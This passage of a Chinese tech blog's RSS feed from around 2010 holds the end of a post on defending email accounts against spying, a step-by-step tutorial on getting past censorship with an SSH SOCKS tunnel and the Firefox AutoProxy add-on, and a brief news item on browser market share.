       .txt文本格式永远是无害的（如果你的系统没有被映像劫持）。尽管如此，但我们仍难以避免地与.DOC、.PDF格式打交道，如果你使用的Gmail，那么一律在线查看。而另一种可能是，你会收到RAR、7z等压缩格式，而邮件内容也颇具引诱性，那么你下载之后，请右键解压至单独的文件夹，而你不认识发件人并有疑心时，永不要马上打开，请上传至Google Docs在线查看，或者提交到<a rel="nofollow" href="http://www.virustotal.com/zh-cn/" target="_blank">VirusTotal.com</a>在线查毒。最好也在邮箱的签名行增加一行文字：我只接受.txt格式附件！其它格式附件的邮件一律删除。</p>
<p><strong><span style="color: #0000ff;">3、防御身份盗窃</span></strong><br />
       建议启用数字签名。它可以协助你确认签名者的身份及数据完整性，甚至你发出的邮件，对方能够获得确认，从而避免被第三方攻击者的滥用。与此同时，双方还可以明文约定，即在准确的时间范围内容发送邮件，如一般为每个星期日发送邮件，而未在此时间范围内的邮件而作废。</p>
<p><strong><span style="color: #0000ff;">4、防御数据失窃</span></strong><br />
       正如前文所提，你应该使用TrueCrypt加密附件。这款经典的加密工具备受赞誉，你应该保持经常使用的习惯。</p>
<p><strong><span style="color: #0000ff;">5、防御身份泄密<br />
</span></strong>       你的密码提示问题应该是模棱两可，比如“天下有多少颗月亮？”。而在个人注册信息处，不要留下你真实家庭地址、身份证号、电话号码、出生日期等信息，当你的邮箱被攻破，这些信息能够证明你的身份。不要将这些信息设置为公开，而是保密，并阻止在Google Profiles可见。</p>
<p><strong><span style="color: #0000ff;">6、使用Chrome浏览器</span></strong><br />
       在TippingPoint第三届Pwn2Own黑客大会，Apple’s Safari, Mozilla’s Firefox和Microsoft’s Internet Explorer 8全部阵亡，你应该接纳黑客们的建议，使用Chrome浏览器，我不能保证Chrome会一直安全的，因为安全是个伪命题，就目前而言，Chrome是个不错的选择。当然，下一届的Pwn2Own王者可能会是Firefox，不管如何，IE不是个好选择，因为中国的黑客正在折腾它。</p>
<p><strong><span style="color: #0000ff;">7、使用Gmail<br />
</span></strong>       在我长达半年的测试，我仍然无法拿下Gmail，它太安全了，这使我郁火，当然，我也不能保证它也是最安全的，至少目前我没有听到Gmail存在安全漏洞的消息。</p>
<p><strong><span style="color: #0000ff;">8、每月密码老化<br />
</span></strong>       微软声称，<a rel="nofollow" href="http://www.cnbeta.com/articles/108569.htm" target="_blank">定期改密码没有用</a>，只会浪费时间与金钱。我反对这种说法，当然，他们的调查结果是针对美国企业。我的建议是，密码请设置为12位，每月更改电子邮箱密码。间谍与黑客不一样，间谍才不会愚蠢地删除你的邮件并更改你的密码，那不可能，他们会暗中的监视你的邮件来往情况，伺机获得可起诉的把柄。</p>
<p><br class="spacer_" /></p>
<p><strong><span style="font-size: medium;">四、反跟踪</span></strong></p>
<p>       在你尚未成为他人的鱼之前，先搞翻这位渔人。</p>
<p><strong><span style="color: #0000ff;">1、阻止邮件中的媒体</span></strong></p>
<p>       如果你不想攻击者获取到你的IP地址、浏览器、操作系统等信息，你应该阻止邮件中图片显示。这是为什么？显示图片则意味着你访问了该图片的服务器，而该服务器则记录了你的访问数据。如果你已经安装了IIS、Apache，那么你可以打开<a href="http://localhost">http://localhost</a>，再去查看它们的日志信息，看看到底有没有记录你的访问信息。</p>
<p>       而如果你没有装上IIS、Apache无法测试的话，你可以打开间谍猪：<a rel="nofollow" href="http://www.spypig.com/" target="_blank">http://www.spypig.com/</a> 向自己的邮箱发送测试邮件。如果你使用的Gmail，那非常好，Gmail默认是阻止图片显示的。</p>
<p><strong><span style="color: #0000ff;">2、跟踪发件人的来源</span></strong><br />
       如果你用的Foxmail客户端，那很简单：邮件——邮件信息——原始信息，即可看到发件人的IP地址。如果你使用的Gmail，你可以在邮件的右侧点击三角形的下拉框，选择Show Original查看邮件头，要是看的头晕，可直接找&#8221;Received&#8221;那一行，将其后的IP地址放到<a rel="nofollow" href="http://www.myip.cn" target="_blank">www.myip.cn</a>进行查询，以确认发件人来自哪里。</p>
<p><strong><span style="color: #0000ff;">3、质询</span></strong><br />
       陌生人可能发送热点事件的邮件，诸如玉树地震死亡名单，维权人士名单，他试图激起你的好奇心以及人道主义、爱心等。你不应该马上查看，而是澄清你的疑问，这份名单的出处来自哪里？你为什么拥有这份名单？你发送给我的理由是什么？要是对方无法消除你的疑问以及无回复，我建议你将这封邮件的附件下载，交提交到VirusTotal上报病毒。</p>
<p><strong><span style="color: #0000ff;">4、搜索</span></strong><br />
       搜索对方的邮箱地址，看看在互联网是否有迹可寻。如果你使用Gmail，可在邮件中点击“Show details”看看此封邮件是否为群发邮件，如果是，直接回复所有人询问：这封邮件带有病毒吗？</p>
<p><strong><span style="color: #0000ff;">5、检查过滤器</span></strong><br />
       现在登陆你的Gmail，进入设置项，选择“Filters”标签，检查是否存可疑的邮箱地址，如果有，请迅速删除，否则，你的邮件全被偷了。</p>
<p><br class="spacer_" /></p>
<p><span style="font-size: medium;"><strong>五、反思</strong></span></p>
<p>       从陆战、水战、空战、网战、太空战，全球各国都在试图提升各个空间作战实力，显然，在网战这块，中国是大小通吃，吃完之后还坚决反对没吃。以Google事件为例，华尔街日报昨天的报道<a rel="nofollow" href="http://proxysun.appspot.com/o?o=327377656e746168773d656372756f733f7073612e3134313432316365742f30323430303130322f62672f6d6f632e6a73772e6e632f2f3a70747468" target="_blank">《谷歌攻击者获得用户识别软件代码》</a>，提及攻击者使用了谷歌工程师的工作站作为跳板，尽管我不能核实其真实性，但在《挑战五毛党》这篇分析文也提及Google中国区被安插内鬼。接下来，北京政府将如何应对Google后续事件呢？吃？抑或没吃呢？</p>
<h3>相关文章</h3>
<ul class="related_posts">
<li><a href="http://www.cfresh.net/it-web-news/809" title="月光论坛因涉嫌地图泄密被查处" rel="bookmark inlinks">月光论坛因涉嫌地图泄密被查处</a><span class="count">( 26 )</span></li>
<li><a href="http://www.cfresh.net/pc-tech/43" title="软件安装包恶意插件克星-Universal Extractor 1.6" rel="bookmark inlinks">软件安装包恶意插件克星-Universal Extractor 1.6</a><span class="count">( 17 )</span></li>
<li><a href="http://www.cfresh.net/pc-tech/248" title="特别奉献二--09年国内外免费个人防火墙大搜罗" rel="bookmark inlinks">特别奉献二&#8211;09年国内外免费个人防火墙大搜罗</a><span class="count">( 1 )</span></li>
<li><a href="http://www.cfresh.net/it-web-news/12" title="网易163再度开放POP3/SMTP，携手其他措施启动“@计划”" rel="bookmark inlinks">网易163再度开放POP3/SMTP，携手其他措施启动“@计划”</a><span class="count">( 13 )</span></li>
<li><a href="http://www.cfresh.net/it-web-news/788" title="微博客Twitter全球信息仅1/3来自美国，日本用户数量居第二" rel="bookmark inlinks">微博客Twitter全球信息仅1/3来自美国，日本用户数量居第二</a><span class="count">( 14 )</span></li>
<li><a href="http://www.cfresh.net/pc-tech/108" title="可穿透防火墙的远程控制软件-TeamViewer V4.1.6080 绿色汉化版下载" rel="bookmark inlinks">可穿透防火墙的远程控制软件-TeamViewer V4.1.6080 绿色汉化版下载</a><span class="count">( 16 )</span></li>
<li><a href="http://www.cfresh.net/other/169" title="谷歌中国被谴责含有不良淫秽内容登上新闻联播和焦点访谈" rel="bookmark inlinks">谷歌中国被谴责含有不良淫秽内容登上新闻联播和焦点访谈</a><span class="count">( 3 )</span></li>
<li><a href="http://www.cfresh.net/it-web-news/144" title="Google Chrome OS截图面世" rel="bookmark inlinks">Google Chrome OS截图面世</a><span class="count">( 3 )</span></li>
</ul>
]]></content:encoded>
			<wfw:commentRss>http://www.cfresh.net/pc-tech/820/feed</wfw:commentRss>
		<slash:comments>29</slash:comments>
		</item>
		<item>
		<title>利用SSH+FireFox实现完美翻墙（图文教程）</title>
		<link>http://www.cfresh.net/pc-tech/662</link>
		<comments>http://www.cfresh.net/pc-tech/662#comments</comments>
		<pubDate>Tue, 09 Mar 2010 05:04:48 +0000</pubDate>
		<dc:creator>秋天</dc:creator>
				<category><![CDATA[计算机应用]]></category>
		<category><![CDATA[firefox]]></category>
		<category><![CDATA[gfw]]></category>
		<category><![CDATA[浏览器]]></category>
		<category><![CDATA[翻墙]]></category>

		<guid isPermaLink="false">http://www.cfresh.net/?p=662</guid>
		<description><![CDATA[        臣本屁民，蜗居于天朝，苟全性命于网络，不求闻达于四海。         敢封哥的网，先从哥的尸体上跨过去！         扯淡完毕，切入正题。        翻墙术大概分这么几种：        修改hosts文件，https（SSL）安全浏览，在线代理，VPN，SSH等。        这里秋天选择一种：SSH来讲解，此方法以FireFox配合为例，采用SSH+Tunnlier+firefox+AutoProxy实现完全无障碍翻墙，其他应用举一反三。         第一步，SSH账号的获得        首先，要拥有一个SSH账号，方法有很多种：网上搜索可得，购买空间可得，免费注册可得 etc.        购买很多国外的空间都会赠送SSH账号；当然也有免费的午餐。        ======================2010.8.4更新======================        根据众多网友的反映，由于本文原本提及的cjb.net网站免费ssh服务后来出现不稳定的情况，秋天不再做推荐。在此可以使用另一高速且无需注册的SSH账号服务：Shellmix，根据秋天的试用，试用此SSH通过直接SSH转socks代理后在firefox下观看电影几乎不需缓冲。如果发现Shellmix服务不可用，请自行在Google上搜索&#8221;free ssh account&#8221;寻找新的免费SSH服务。        Shellmix提供了两个免费SSH账号，对应不同的服务器，服务器端口均为30，详情如下：        SSH账号1主机地址：shellmix.com        登录账号：newusershell        登录密码：newusershell        SSH账号2主机地址：fgfg.pl        登录账号：newuser        登录密码：newuser        至此，你已经又有了一个长期有效且免费的SSH账号了，接下来看如何配合FireFox使用。         PS，有人会问：你不是Opera的忠实粉丝吗？        答：为了在方便调试博客(www.cfresh.net)和一些其他临时用途，秋天装了一个绿色版FF备用。         ======================2010.5.15更新======================        由于MyEnTunnel使用Plink核心，存在连接不稳定和转化效率低的情况，现推荐使用Tunnlier替代MyEnTunnel作为SSH客户端，其余步骤配置仍同本文。如果你的网络浏览器/软件不支持Socks代理，请移步另一篇文章：通过SSH利用Tunnelier+Privoxy实现任意浏览器翻墙。        第二步，使用客户端软件Tunnlier连接SSH        软件下载地址：         安装版：http://dl.bitvise.com/Tunnelier-Inst.exe         绿色版：http://tp.vbap.com.au/download                安装版安装完成后，启动软件，来到如图所示界面，依次输入SSH服务器地址、用户名、端口（shellmix使用30端口，一般空间提供的SSH为22端口）、密码，并勾选”Password”下的”Store encrypted password in profile”，如图：          接下来切换到”Options”选项卡，进入选项配置         因为Tunnelier默认在连接SSH服务器时开启SFTP和命令行SSH终端，如果你并不需要可以在”On Login”下框选取消”Open Terminal”和”Open SFTP”。         继续切换到”Services”选项卡，进入服务配置         勾选”SOCKS/HTTP Proxy Forwarding”下的”Enabled”选项框，第一行监听地址输入127.0.0.1，第二行监听端口输入socks转发端口，如1080，第三行保持0.0.0.0不变。再点左侧的”Save Profile As”按钮，将当前的配置保存为文件方便以后软件启动时调用。  [...]]]></description>
			<content:encoded><![CDATA[<p style="text-align: left;">        臣本屁民，蜗居于天朝，苟全性命于网络，不求闻达于四海。<br />
        敢封哥的网，先从哥的尸体上跨过去！ </p>
<p style="text-align: left;">       扯淡完毕，切入正题。<br />
       翻墙术大概分这么几种：<br />
       修改hosts文件，https（SSL）安全浏览，在线代理，VPN，SSH等。<br />
       这里秋天选择一种：SSH来讲解，此方法以FireFox配合为例，采用SSH+Tunnlier+firefox+AutoProxy实现完全无障碍翻墙，其他应用举一反三。 </p>
<p><span id="more-662"></span><br />
       <strong>第一步，SSH账号的获得</strong><br />
       首先，要拥有一个SSH账号，方法有很多种：网上搜索可得，购买空间可得，免费注册可得 etc.<br />
       购买很多国外的空间都会赠送SSH账号；当然也有免费的午餐。</p>
<p>       ======================<strong>2010.8.4更新</strong>======================</p>
<p>       根据众多网友的反映，由于本文原本提及的cjb.net网站免费ssh服务后来出现不稳定的情况，秋天不再做推荐。在此可以使用另一高速且无需注册的SSH账号服务：<a rel="nofollow" href="http://shellmix.com/" target="_blank">Shellmix</a>，根据秋天的试用，试用此SSH通过直接SSH转socks代理后在firefox下观看电影几乎不需缓冲。如果发现Shellmix服务不可用，请自行在Google上搜索&#8221;free ssh account&#8221;寻找新的免费SSH服务。</p>
<p>       Shellmix提供了两个免费SSH账号，对应不同的服务器，服务器端口均为30，详情如下：</p>
<p>       SSH账号1主机地址：shellmix.com<br />
       登录账号：newusershell<br />
       登录密码：newusershell</p>
<p>       SSH账号2主机地址：fgfg.pl<br />
       登录账号：newuser<br />
       登录密码：newuser</p>
<p><p>       至此，你已经又有了一个长期有效且免费的SSH账号了，接下来看如何配合FireFox使用。 </p>
<p style="text-align: left;">       PS，有人会问：你不是Opera的忠实粉丝吗？<br />
       答：为了在方便调试博客(<a href="http://www.cfresh.net/">www.cfresh.net</a>)和一些其他临时用途，秋天装了一个绿色版FF备用。 </p>
<p>       ======================<strong>2010.5.15更新</strong>======================</p>
<p>       <span style="color: #000000;">由于MyEnTunnel使用Plink核心，存在连接不稳定和转化效率低的情况，现推荐使用Tunnlier替代MyEnTunnel作为SSH客户端，其余步骤配置仍同本文。如果你的网络浏览器/软件不支持Socks代理，请移步另一篇文章：<a href="http://www.cfresh.net/pc-tech/801" target="_blank">通过SSH利用Tunnelier+Privoxy实现任意浏览器翻墙</a>。</span><br class="spacer_" /></p>
<p style="text-align: left;">       <strong>第二步，使用客户端软件Tunnlier连接SSH</strong><strong><br />
</strong>       软件下载地址：<br />
        安装版：<a href="http://dl.bitvise.com/Tunnelier-Inst.exe">http://dl.bitvise.com/Tunnelier-Inst.exe</a><br />
        绿色版：<a href="http://tp.vbap.com.au/download">http://tp.vbap.com.au/download</a>       </p>
<p style="text-align: left;">        安装版安装完成后，启动软件，来到如图所示界面，依次输入SSH服务器地址、用户名、端口（shellmix使用30端口，一般空间提供的SSH为22端口）、密码，并勾选”Password”下的”Store encrypted password in profile”，如图：</p>
<p><br class="spacer_" /></p>
<p style="text-align: center;"><img class="aligncenter" src="/wp-content/uploads/2010/08/tunnlier-login.jpg" alt="Tunnlier登录界面设置" width="600" height="604" /></p>
<p><br class="spacer_" /></p>
<p>         接下来切换到”Options”选项卡，进入选项配置<br />
        因为Tunnelier默认在连接SSH服务器时开启SFTP和命令行SSH终端，如果你并不需要可以在”On Login”下框选取消”Open Terminal”和”Open SFTP”。</p>
<p style="text-align: center;"><img class="aligncenter" src="/wp-content/uploads/2010/04/Tunnelier-option.jpg" alt="Tunnlier设置-选项" width="646" height="650" /></p>
</p>
<p style="text-align: left;">
<p>        继续切换到”Services”选项卡，进入服务配置<br />
        勾选”SOCKS/HTTP Proxy Forwarding”下的”Enabled”选项框，第一行监听地址输入127.0.0.1，第二行监听端口输入socks转发端口，如1080，第三行保持0.0.0.0不变。再点左侧的”Save Profile As”按钮，将当前的配置保存为文件方便以后软件启动时调用。 </p>
</p>
<p style="text-align: left;">
<p style="text-align: center;"><img src="/wp-content/uploads/2010/04/Tunnelier-services.jpg" alt="Tunnlier设置-服务" width="646" height="650" /><br class="spacer_" /></p>
<p style="text-align: left;">        至此SSH客户端Tunnelier设置完成，接下来开始安装Firefox插件。<br class="spacer_" /></p>
</p>
<p style="text-align: center;">
<p style="text-align: left;">      <strong> 第三步，配置FireFox</strong><br />
       给FireFox添加插件：&#8221;AutoProxy&#8221;，此插件专门为应对GFW而生，在此大力表扬一下软件作者！<br />
       添加完毕后重启FF，然后你会看到一个对话框，选择gfwlist (P.R.China)后，点击&#8221;确定&#8221;。 </p>
<p><br class="spacer_" /></p>
<p style="text-align: center;"><img class="aligncenter size-full wp-image-672" title="AutoProxy-1" src="http://i46.tinypic.com/acajwg.jpg" alt="AutoProxy-1" width="598" height="448" /></p>
<p><br class="spacer_" /></p>
<p style="text-align: left;">       接着你会看到Firefox主界面右下角出现有一个“福”字图案，点击“福”，然后点击菜单&#8221;代理服务器&#8221;&#8211;&#8221;编辑代理服务器”</p>
</p>
<p style="text-align: center;"><img src="/wp-content/uploads/2010/09/Edit-proxy-settings.png" alt="Edit proxy settings" width="517" height="375" />      </p>
<p style="text-align: center;">
<p style="text-align: center;">
<p style="text-align: left;">        这时会看到它提供了很多种代理方式，如Tor、GappProxy、Puff等，需要注意的是将&#8221;ssh -D&#8221;代理端口设置与上面的Tunnlier软件&#8221;Service&#8221;标签页下&#8221;Listen port&#8221;端口（非SSH端口）保持一致（1080）。<br class="spacer_" /></p>
<p style="text-align: center;"><img class="aligncenter size-full wp-image-684" title="AutoProxy-选择代理服务器" src="http://i50.tinypic.com/alji9v.jpg" alt="" width="434" height="264" /></p>
<p><br class="spacer_" /></p>
<p style="text-align: left;">       点击&#8221;确定&#8221;回到插件设置主界面，点击&#8221;代理服务器&#8221;&#8211;&#8221;选择代理服务器”，在&#8221;主代理&#8221;下拉菜单中选择&#8221;ssh -D&#8221;，返回插件主界面，接着&#8221;确定&#8221;。<br class="spacer_" /></p>
<p><br class="spacer_" /></p>
<p><p style="text-align: center;"><img class="aligncenter size-full wp-image-685" title="Twitter就在眼前" src="http://i47.tinypic.com/2wfvg9f.jpg" alt="" width="795" height="522" />       </p>
<p style="text-align: center;">
<p style="text-align: left;">       这时再打开你的FF，空气是不是清新多了？ <br class="spacer_" /></p>
<p style="text-align: left;">      <span style="color: #0000ff;"> 顺便提一下秋天利用GAE搭建的两个代理类API：</span><br />
       1，支持https安全访问的在线代理服务器：<a href="https://flow-proxy.appspot.com/">https://flow-proxy.appspot.com</a>（注：该程序不支持cookies）；<br />
       2，一个twitter代理API：<a href="http://x-flow.appspot.com/">http://x-flow.appspot.com/</a> </p>
<p style="text-align: center;">
<p style="text-align: left;">       技术之外：这两天秋天事情很忙，又遇到一些小的不太顺心的事情，因此博客更新及回访频率略有下降，请给位看官多多谅解。</p>
</p>
</p>
</p>
<h3>相关文章</h3>
<ul class="related_posts">
<li><a href="http://www.cfresh.net/other/569" title="Opera9.5死机" rel="bookmark inlinks">Opera9.5死机</a><span class="count">( 1 )</span></li>
<li><a href="http://www.cfresh.net/pc-tech/214" title="OpenDNS--防止ISPDNS域名劫持最简单有效解决方案" rel="bookmark inlinks">OpenDNS&#8211;防止ISPDNS域名劫持最简单有效解决方案</a><span class="count">( 2 )</span></li>
<li><a href="http://www.cfresh.net/other/219" title="Opera恢复皮肤下载" rel="bookmark inlinks">Opera恢复皮肤下载</a><span class="count">( 0 )</span></li>
<li><a href="http://www.cfresh.net/pc-tech/212" title="IE8网站论坛不能上传图片解决办法" rel="bookmark inlinks">IE8网站论坛不能上传图片解决办法</a><span class="count">( 2 )</span></li>
<li><a href="http://www.cfresh.net/pc-tech/820" title="账号安全--预防身边的邮箱间谍" rel="bookmark inlinks">账号安全&#8211;预防身边的邮箱间谍</a><span class="count">( 29 )</span></li>
<li><a href="http://www.cfresh.net/web-security/41" title="IE7爆异常CSS导致内存破坏安全漏洞（可用于执行任意程序）" rel="bookmark inlinks">IE7爆异常CSS导致内存破坏安全漏洞（可用于执行任意程序）</a><span class="count">( 13 )</span></li>
<li><a href="http://www.cfresh.net/it-web-news/82" title="Opera Mini 5 Beta隆重发布" rel="bookmark inlinks">Opera Mini 5 Beta隆重发布</a><span class="count">( 13 )</span></li>
<li><a href="http://www.cfresh.net/it-web-news/817" title="享受强大的HTML5动画效果" rel="bookmark inlinks">享受强大的HTML5动画效果</a><span class="count">( 28 )</span></li>
</ul>
]]></content:encoded>
			<wfw:commentRss>http://www.cfresh.net/pc-tech/662/feed</wfw:commentRss>
		<slash:comments>95</slash:comments>
		</item>
		<item>
		<title>IE市场占有率跌破60% FireFox冲至30%</title>
		<link>http://www.cfresh.net/it-web-news/153</link>
		<comments>http://www.cfresh.net/it-web-news/153#comments</comments>
		<pubDate>Sat, 04 Jul 2009 07:07:00 +0000</pubDate>
		<dc:creator>秋天</dc:creator>
				<category><![CDATA[IT网络资讯]]></category>
		<category><![CDATA[firefox]]></category>
		<category><![CDATA[IE]]></category>
		<category><![CDATA[浏览器]]></category>

		<guid isPermaLink="false">http://www.cfresh.net/%e6%9c%aa%e5%88%86%e7%b1%bb/153</guid>
		<description><![CDATA[&#160;&#160;&#160;&#160;&#160;&#160;Firefox 3.5的发布又给这款浏览器产品的世界市场带来了更大火力,24小时内超过500万次下载,带来了更高的市场占有率.&#160;&#160;&#160;&#160;&#160;&#160;statcounter提供的最新数据表明,FireFox的市场占有率已经从28.75%升到30.33%,而长期占据老大地位的Internet Explorer则从62.09%下滑到59.49%,跌破60%大关,Opera进步不小,数据为3.36%,Safari和Chrome的最新占有率分别为3.36%和2.82%,以上所有非IE浏览器均获得了市占率提升,全面包围和蚕食IE. 截止6月各浏览器市场占有率 &#160;&#160;&#160;&#160;&#160;&#160;0point评注：以前从来没有在WIN下用过Firefox，因为一直用Opera，偶尔用用IE打开以下需要插件之类的网站。前几天为了测试海天的博客特意装了FireFox中国版；结果的确令我有些意外，安装完毕后首先可以选择从其它浏览器中导入收藏夹（书签），单凭这一点就非常人性化。再一用，网站打开速度的确非常快，比机器上装的 Opera、IE、Safari都快；这一次试用让我对FireFox立即刮目相看。怪不得它的市场占有率逐渐稳步攀升了。不过虽然FireFox这么优秀，我仍然偏爱Opera，前几天刚升级到Opera 10.0，它的Opera Turbo让我非常喜欢，在打开某些网站时启用，速度能得到明显提升。市场占有率终于从以前的1%左右徘徊晋升到3.36%，的确取得了不小的进步。IE如果在安全性、新技术、人性化操作上不能取得突破，那么它的市场占有率就注定要进一步下滑。 相关文章 Opera 10 build 1642 beta 2 发布( 7 ) Google Chrome OS截图面世( 3 ) Opera发布Opera Mini使用状况报告( 15 ) Opera Mini 5 Beta隆重发布( 13 ) Opera 10.51正式版闪亮登场( 18 ) IE8网站论坛不能上传图片解决办法( 2 ) Opera 10.00 Build 1606 Beta发布( 2 ) 微软将售欧盟版Windows 7不绑定IE浏览器( 1 )]]></description>
			<content:encoded><![CDATA[<p>&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;Firefox 3.5的发布又给这款浏览器产品的世界市场带来了更大火力,24小时内超过500万次下载,带来了更高的市场占有率.<br/>&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;statcounter提供的最新数据表明,FireFox的市场占有率已经从28.75%升到30.33%,而长期占据老大地位的Internet Explorer则从62.09%下滑到59.49%,跌破60%大关,Opera进步不小,数据为3.36%,Safari和Chrome的最新占有率分别为3.36%和2.82%,以上所有非IE浏览器均获得了市占率提升,全面包围和蚕食IE.<br/><br/>
<div align="center"><img src="http://www.cfresh.net/wp-content/uploads/2009/07/820097415913.jpg" border="0" alt="截止6月各浏览器市场占有率"/><br/></div>
<p><br/>
<div align="center">截止6月各浏览器市场占有率</div>
<p><br/>&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;0point评注：以前从来没有在WIN下用过Firefox，因为一直用Opera，偶尔用用IE打开以下需要插件之类的网站。前几天为了测试<a target="_blank" href="http://htwy.org.ru" rel="external">海天的<a href="http://www.cfresh.net" target="_blank">博客</a></a>特意装了FireFox中国版；结果的确令我有些意外，安装完毕后首先可以选择从其它浏览器中导入收藏夹（书签），单凭这一点就非常人性化。再一用，网站打开速度的确非常快，比机器上装的 Opera、IE、Safari都快；这一次试用让我对FireFox立即刮目相看。怪不得它的市场占有率逐渐稳步攀升了。不过虽然FireFox这么优秀，我仍然偏爱Opera，前几天刚升级到<a target="_blank" href="http://www.0point.cn/article/basic-computer-application/opera-10.00-build-1606-beta-releases.htm" rel="external">Opera 10.0</a>，它的Opera Turbo让我非常喜欢，在打开某些网站时启用，速度能得到明显提升。市场占有率终于从以前的1%左右徘徊晋升到3.36%，的确取得了不小的进步。IE如果在安全性、新技术、人性化操作上不能取得突破，那么它的市场占有率就注定要进一步下滑。</p>
<h3>相关文章</h3>
<ul class="related_posts">
<li><a href="http://www.cfresh.net/web-security/199" title="Safari RSS feed:// 缓冲区溢出Exp代码" rel="bookmark inlinks">Safari RSS feed:// 缓冲区溢出Exp代码</a><span class="count">( 0 )</span></li>
<li><a href="http://www.cfresh.net/it-web-news/17" title="Opera 10.50 Build 3186 Pre-Alpha发布" rel="bookmark inlinks">Opera 10.50 Build 3186 Pre-Alpha发布</a><span class="count">( 12 )</span></li>
<li><a href="http://www.cfresh.net/it-web-news/127" title="Opera发布Opera Mini使用状况报告" rel="bookmark inlinks">Opera发布Opera Mini使用状况报告</a><span class="count">( 15 )</span></li>
<li><a href="http://www.cfresh.net/pc-tech/212" title="IE8网站论坛不能上传图片解决办法" rel="bookmark inlinks">IE8网站论坛不能上传图片解决办法</a><span class="count">( 2 )</span></li>
<li><a href="http://www.cfresh.net/it-web-news/137" title="Opera 10 build 1642 beta 2 发布" rel="bookmark inlinks">Opera 10 build 1642 beta 2 发布</a><span class="count">( 7 )</span></li>
<li><a href="http://www.cfresh.net/other/20" title="我是藕粉我疯狂--记收到Opera礼品【多图】" rel="bookmark inlinks">我是藕粉我疯狂&#8211;记收到Opera礼品【多图】</a><span class="count">( 25 )</span></li>
<li><a href="http://www.cfresh.net/pc-tech/624" title="解决百度空间在Opera下自动刷新的问题" rel="bookmark inlinks">解决百度空间在Opera下自动刷新的问题</a><span class="count">( 30 )</span></li>
<li><a href="http://www.cfresh.net/it-web-news/160" title="Opera 10.00 Build 1606 Beta发布" rel="bookmark inlinks">Opera 10.00 Build 1606 Beta发布</a><span class="count">( 2 )</span></li>
</ul>
]]></content:encoded>
			<wfw:commentRss>http://www.cfresh.net/it-web-news/153/feed</wfw:commentRss>
		<slash:comments>2</slash:comments>
		</item>
	</channel>
</rss>
